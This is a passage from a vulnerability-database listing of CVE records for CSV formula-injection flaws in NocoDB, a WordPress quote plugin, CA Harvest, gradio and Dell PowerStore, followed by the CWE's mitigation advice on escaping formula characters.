"url": "https://github.com/nocodb/nocodb/commit/079e3abe"
},
{
"name": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2022-22121",
"refsource": "MISC",
"url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2022-22121"
}
]
},
"solution": [
{
"lang": "en",
"value": "Update to version 0.84.0 or later"
}
],
"source": {
"advisory": "https://www.whitesourcesoftware.com/vulnerability-database/",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "478c68dd-22c1-4a41-97cd-654224dfacff",
"assignerShortName": "Mend",
"cveId": "CVE-2022-22121",
"datePublished": "2022-01-10T15:25:28.528Z",
"dateReserved": "2021-12-21T00:00:00.000Z",
"dateUpdated": "2024-09-17T04:09:34.606Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-2240 (GCVE-0-2022-2240)
Vulnerability from cvelistv5 – Published: 2022-07-25 12:47 – Updated: 2024-08-03 00:32
VLAI
Title
Request a Quote <= 2.3.7 - CSV Injection
Summary
The Request a Quote WordPress plugin through 2.3.7 does not validate uploaded CSV files, allowing unauthenticated users to attach a malicious CSV file to a quote, which could lead to a CSV injection once an admin download and open it
Severity
No CVSS data available.
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://wpscan.com/vulnerability/6a3a573e-f9f2-45… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Unknown | Request a Quote |
Affected:
2.3.7 , ≤ 2.3.7
(custom)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:32:09.260Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wpscan.com/vulnerability/6a3a573e-f9f2-45ec-9156-332cc551fc7e"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Request a Quote",
"vendor": "Unknown",
"versions": [
{
"lessThanOrEqual": "2.3.7",
"status": "affected",
"version": "2.3.7",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Benachi"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Request a Quote WordPress plugin through 2.3.7 does not validate uploaded CSV files, allowing unauthenticated users to attach a malicious CSV file to a quote, which could lead to a CSV injection once an admin download and open it"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-07-25T12:47:54.000Z",
"orgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"shortName": "WPScan"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wpscan.com/vulnerability/6a3a573e-f9f2-45ec-9156-332cc551fc7e"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Request a Quote \u003c= 2.3.7 - CSV Injection",
"x_generator": "WPScan CVE Generator",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "contact@wpscan.com",
"ID": "CVE-2022-2240",
"STATE": "PUBLIC",
"TITLE": "Request a Quote \u003c= 2.3.7 - CSV Injection"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Request a Quote",
"version": {
"version_data": [
{
"version_affected": "\u003c=",
"version_name": "2.3.7",
"version_value": "2.3.7"
}
]
}
}
]
},
"vendor_name": "Unknown"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Benachi"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Request a Quote WordPress plugin through 2.3.7 does not validate uploaded CSV files, allowing unauthenticated users to attach a malicious CSV file to a quote, which could lead to a CSV injection once an admin download and open it"
}
]
},
"generator": "WPScan CVE Generator",
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wpscan.com/vulnerability/6a3a573e-f9f2-45ec-9156-332cc551fc7e",
"refsource": "MISC",
"url": "https://wpscan.com/vulnerability/6a3a573e-f9f2-45ec-9156-332cc551fc7e"
}
]
},
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"assignerShortName": "WPScan",
"cveId": "CVE-2022-2240",
"datePublished": "2022-07-25T12:47:55.000Z",
"dateReserved": "2022-06-28T00:00:00.000Z",
"dateUpdated": "2024-08-03T00:32:09.260Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-22689 (GCVE-0-2022-22689)
Vulnerability from cvelistv5 – Published: 2022-02-04 22:29 – Updated: 2024-08-03 03:21
VLAI
Summary
CA Harvest Software Change Manager versions 13.0.3, 13.0.4, 14.0.0, and 14.0.1, contain a vulnerability in the CSV export functionality, due to insufficient input validation, that can allow a privileged user to potentially execute arbitrary code or commands.
Severity
No CVSS data available.
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://support.broadcom.com/security-advisory/co… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | CA Harvest Software Change Manager |
Affected:
13.0.3, 13.0.4, 14.0.0, 14.0.1
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T03:21:48.947Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://support.broadcom.com/security-advisory/content/security-advisories/CA20220203-01-Security-Notice-for-CA-Harvest-Software-Change-Manager/ESDSA20297"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "CA Harvest Software Change Manager",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "13.0.3, 13.0.4, 14.0.0, 14.0.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CA Harvest Software Change Manager versions 13.0.3, 13.0.4, 14.0.0, and 14.0.1, contain a vulnerability in the CSV export functionality, due to insufficient input validation, that can allow a privileged user to potentially execute arbitrary code or commands."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-02-04T22:29:27.000Z",
"orgId": "e291eae9-7c0a-46ac-ba7d-5251811f8b7f",
"shortName": "ca"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://support.broadcom.com/security-advisory/content/security-advisories/CA20220203-01-Security-Notice-for-CA-Harvest-Software-Change-Manager/ESDSA20297"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "vuln@ca.com",
"ID": "CVE-2022-22689",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "CA Harvest Software Change Manager",
"version": {
"version_data": [
{
"version_value": "13.0.3, 13.0.4, 14.0.0, 14.0.1"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "CA Harvest Software Change Manager versions 13.0.3, 13.0.4, 14.0.0, and 14.0.1, contain a vulnerability in the CSV export functionality, due to insufficient input validation, that can allow a privileged user to potentially execute arbitrary code or commands."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.broadcom.com/security-advisory/content/security-advisories/CA20220203-01-Security-Notice-for-CA-Harvest-Software-Change-Manager/ESDSA20297",
"refsource": "MISC",
"url": "https://support.broadcom.com/security-advisory/content/security-advisories/CA20220203-01-Security-Notice-for-CA-Harvest-Software-Change-Manager/ESDSA20297"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e291eae9-7c0a-46ac-ba7d-5251811f8b7f",
"assignerShortName": "ca",
"cveId": "CVE-2022-22689",
"datePublished": "2022-02-04T22:29:27.000Z",
"dateReserved": "2022-01-05T00:00:00.000Z",
"dateUpdated": "2024-08-03T03:21:48.947Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-24770 (GCVE-0-2022-24770)
Vulnerability from cvelistv5 – Published: 2022-03-17 20:30 – Updated: 2025-04-23 18:46
VLAI
Title
Improper Neutralization of Formula Elements in a CSV File in Gradio Flagging
Summary
`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer's computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user's computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs.
Severity
8.8 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
3 references
| URL | Tags |
|---|---|
| https://github.com/gradio-app/gradio/security/adv… | x_refsource_CONFIRM |
| https://github.com/gradio-app/gradio/pull/817 | x_refsource_MISC |
| https://github.com/gradio-app/gradio/commit/80fea… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| gradio-app | gradio |
Affected:
< 2.8.11
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T04:20:50.502Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-f8xq-q7px-wg8c"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/gradio-app/gradio/pull/817"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/gradio-app/gradio/commit/80fea89117358ee105973453fdc402398ae20239"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-24770",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-23T15:55:02.672639Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-23T18:46:31.781Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "gradio",
"vendor": "gradio-app",
"versions": [
{
"status": "affected",
"version": "\u003c 2.8.11"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer\u0027s computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user\u0027s computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-03-17T20:30:19.000Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-f8xq-q7px-wg8c"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/gradio-app/gradio/pull/817"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/gradio-app/gradio/commit/80fea89117358ee105973453fdc402398ae20239"
}
],
"source": {
"advisory": "GHSA-f8xq-q7px-wg8c",
"discovery": "UNKNOWN"
},
"title": "Improper Neutralization of Formula Elements in a CSV File in Gradio Flagging",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2022-24770",
"STATE": "PUBLIC",
"TITLE": "Improper Neutralization of Formula Elements in a CSV File in Gradio Flagging"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "gradio",
"version": {
"version_data": [
{
"version_value": "\u003c 2.8.11"
}
]
}
}
]
},
"vendor_name": "gradio-app"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer\u0027s computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user\u0027s computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/gradio-app/gradio/security/advisories/GHSA-f8xq-q7px-wg8c",
"refsource": "CONFIRM",
"url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-f8xq-q7px-wg8c"
},
{
"name": "https://github.com/gradio-app/gradio/pull/817",
"refsource": "MISC",
"url": "https://github.com/gradio-app/gradio/pull/817"
},
{
"name": "https://github.com/gradio-app/gradio/commit/80fea89117358ee105973453fdc402398ae20239",
"refsource": "MISC",
"url": "https://github.com/gradio-app/gradio/commit/80fea89117358ee105973453fdc402398ae20239"
}
]
},
"source": {
"advisory": "GHSA-f8xq-q7px-wg8c",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2022-24770",
"datePublished": "2022-03-17T20:30:19.000Z",
"dateReserved": "2022-02-10T00:00:00.000Z",
"dateUpdated": "2025-04-23T18:46:31.781Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26867 (GCVE-0-2022-26867)
Vulnerability from cvelistv5 – Published: 2022-06-02 21:00 – Updated: 2024-09-16 17:03
VLAI
Summary
PowerStore SW v2.1.1.0 supports the option to export data to either a CSV or an XLSX file. The data is taken as is, without any validation or sanitization. It allows a malicious, authenticated user to inject payloads that might get interpreted as formulas by the corresponding spreadsheet application that is being used to open the CSV/XLSX file.
Severity
5.9 (Medium)
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.dell.com/support/kbdoc/000196367 | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Dell | PowerStore |
Affected:
unspecified , < PowerStore SW v2.1.1.0
(custom)
|
Date Public
2022-04-19 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:18:38.118Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.dell.com/support/kbdoc/000196367"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "PowerStore",
"vendor": "Dell",
"versions": [
{
"lessThan": "PowerStore SW v2.1.1.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"datePublic": "2022-04-19T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "PowerStore SW v2.1.1.0 supports the option to export data to either a CSV or an XLSX file. The data is taken as is, without any validation or sanitization. It allows a malicious, authenticated user to inject payloads that might get interpreted as formulas by the corresponding spreadsheet application that is being used to open the CSV/XLSX file."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-06-02T21:00:25.000Z",
"orgId": "c550e75a-17ff-4988-97f0-544cde3820fe",
"shortName": "dell"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.dell.com/support/kbdoc/000196367"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secure@dell.com",
"DATE_PUBLIC": "2022-04-19",
"ID": "CVE-2022-26867",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "PowerStore",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "PowerStore SW v2.1.1.0"
}
]
}
}
]
},
"vendor_name": "Dell"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "PowerStore SW v2.1.1.0 supports the option to export data to either a CSV or an XLSX file. The data is taken as is, without any validation or sanitization. It allows a malicious, authenticated user to inject payloads that might get interpreted as formulas by the corresponding spreadsheet application that is being used to open the CSV/XLSX file."
}
]
},
"impact": {
"cvss": {
"baseScore": 5.9,
"baseSeverity": "Medium",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.dell.com/support/kbdoc/000196367",
"refsource": "MISC",
"url": "https://www.dell.com/support/kbdoc/000196367"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c550e75a-17ff-4988-97f0-544cde3820fe",
"assignerShortName": "dell",
"cveId": "CVE-2022-26867",
"datePublished": "2022-06-02T21:00:25.273Z",
"dateReserved": "2022-03-10T00:00:00.000Z",
"dateUpdated": "2024-09-16T17:03:58.884Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
Mitigation
Phase: Implementation
Description:
- When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
Mitigation
Phase: Implementation
Description:
- If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.
Mitigation
Phase: Architecture and Design
Description:
- Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.
No CAPEC attack patterns related to this CWE.